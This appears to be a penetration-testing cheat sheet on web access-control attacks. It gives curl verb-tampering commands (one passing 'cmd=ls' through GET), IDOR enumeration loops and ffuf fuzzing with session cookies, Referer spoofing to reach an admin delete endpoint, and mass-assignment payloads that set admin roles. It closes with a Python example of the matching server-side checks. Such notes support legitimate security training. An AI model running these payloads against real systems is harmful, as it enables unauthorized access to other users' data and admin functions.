Web Attacks (IDOR / Verb Tampering / BFLA)
Access-control attacks from the CWES path: HTTP verb tampering, IDOR enumeration (including encoded IDs), and broken function-level authorization / mass assignment. Each payload is listed on its own line.
HTTP verb tampering
Try HEAD instead of GET (may bypass auth):
curl -I http://IP/admin/
# -I sends a real HEAD request; "-X HEAD" makes curl wait for a body that never arrives
Try PUT (may allow file creation):
curl -X PUT http://IP/admin/
Bypass a POST-only filter by switching to GET:
curl -G http://IP/process.php -d "cmd=ls"
# -G appends the -d data to the query string so the server reads it from GET, not the body
Enumerate accepted verbs:
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do code=$(curl -s -o /dev/null -w "%{http_code}" -X $method http://TARGET/admin/resource); echo "$method: $code"; done
IDOR enumeration
Manual - iterate IDs and grep for output:
for i in {1..20}; do curl -s -b "PHPSESSID=SESSION" "http://IP/profile.php?id=$i" | grep "name:"; done
ffuf automation (find IDs that return 200):
ffuf -w ids.txt -u "http://TARGET/api/users/FUZZ/profile" -H "Cookie: session=YOUR_SESSION" -fc 404,403
Encoded ID - decode, modify, re-encode:
echo -n 'dXNlcjEudHh0' | base64 -d
echo -n 'user2.txt' | base64
Access control models
Understanding the intended model helps spot where it breaks:
| Model | Description | Common flaw |
|---|---|---|
| DAC (Discretionary) | Owner grants access per resource | IDOR — resource IDs not validated per user |
| MAC (Mandatory) | System enforces labels (top secret, public) | Rarely web-app relevant |
| RBAC (Role-Based) | Role determines access (admin, user, viewer) | Role parameter trusted from client; horizontal priv esc |
| ABAC (Attribute-Based) | Access based on user/resource attributes | Attribute injection via request body |
Horizontal privilege escalation
Accessing another user’s resources at the same privilege level. Test by changing a user ID, username, or GUID to another user’s:
GET /api/profile?userId=1337 ← your ID
GET /api/profile?userId=1338 ← someone else's
GET /account/orders/ORDER-001 ← yours
GET /account/orders/ORDER-002 ← another user's order
Vertical privilege escalation
Accessing functionality above your privilege level:
GET /admin/users ← as a regular user
POST /admin/deleteUser?id=5
Try common admin paths with a low-privilege session in Burp Repeater.
Referer-based access control bypass
If the admin page only checks that the Referer header points to /admin/main, set it by hand:
GET /admin/deleteUser?username=carlos HTTP/1.1
Referer: https://TARGET/admin/main
BFLA / mass assignment
Access admin endpoints directly with a regular-user token:
GET /admin/users
POST /api/admin/deleteUser
Role escalation via request body - add privileged fields:
{"role": "admin"}
{"isAdmin": true}
Mass assignment via PATCH:
PATCH /api/users/123
{"email": "new@test.com", "role": "admin"}
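The three flaws above (IDOR, BFLA, mass assignment) as an added example, not code from the original cheat sheet: a minimal handler with each vulnerable path beside the server-side check that closes it. User ids, session tokens and field names are constructed for the example.

```python
# Added example: in-memory "API" showing object-level, function-level and
# mass-assignment checks. All users, sessions and fields are constructed.
USERS = {
    1337: {"name": "alice", "role": "user", "email": "alice@example.test"},
    1338: {"name": "bob", "role": "user", "email": "bob@example.test"},
    1: {"name": "root", "role": "admin", "email": "root@example.test"},
}
SESSIONS = {"sess-alice": 1337, "sess-bob": 1338, "sess-root": 1}

# Fields a client may set on its own profile. "role" and "isAdmin" are
# deliberately absent, so a PATCH body carrying them is silently dropped.
WRITABLE = {"name", "email"}


class Forbidden(Exception):
    pass


def _current_user(session_id):
    """Resolve the caller from the server-side session store."""
    uid = SESSIONS.get(session_id)
    if uid is None:
        raise Forbidden("no valid session")
    return uid, USERS[uid]


def get_profile_vulnerable(session_id, user_id):
    _current_user(session_id)   # authenticated, but ...
    return USERS[user_id]       # ... any id in the URL is served: IDOR


def _assert_owner_or_admin(uid, me, user_id):
    # Object-level check: the id from the request must belong to the caller,
    # unless the caller's stored role is allowed to act on everyone.
    if user_id != uid and me["role"] != "admin":
        raise Forbidden("not your resource")


def get_profile(session_id, user_id):
    uid, me = _current_user(session_id)
    _assert_owner_or_admin(uid, me, user_id)
    return USERS[user_id]


def patch_profile(session_id, user_id, body):
    uid, me = _current_user(session_id)
    _assert_owner_or_admin(uid, me, user_id)
    # Mass-assignment guard: apply only allowlisted fields from the body.
    USERS[user_id].update({k: v for k, v in body.items() if k in WRITABLE})
    return USERS[user_id]


def delete_user(session_id, user_id):
    # Function-level check reads the role stored server-side, never a
    # role/isAdmin field supplied by the client.
    _, me = _current_user(session_id)
    if me["role"] != "admin":
        raise Forbidden("admin only")
    return USERS.pop(user_id, None)
```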